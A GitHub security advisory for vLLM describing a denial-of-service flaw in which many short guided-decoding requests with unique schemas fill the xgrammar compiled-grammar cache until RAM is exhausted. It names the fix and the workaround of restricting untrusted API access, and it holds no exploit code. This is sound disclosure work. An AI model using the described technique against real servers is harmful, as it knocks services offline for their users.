vLLM vulnerable to Denial of Service by abusing xgrammar cache

Impact

This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3

The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.

A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.

Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the guided_decoding_backend key of the extra_body field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.

Patches

vllm-project/vllm#16283

Workarounds

There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.

References

GHSA-389x-67px-mjg3

References

russellb published to vllm-project/vllm Apr 15, 2025

Published to the GitHub Advisory Database Apr 15, 2025

Reviewed Apr 15, 2025

Last updated Apr 15, 2025

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Package

Affected versions

Patched versions

Description

Impact

Patches

Workarounds

References

References

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

EPSS score

Weaknesses

CVE ID

GHSA ID

Source code

Credits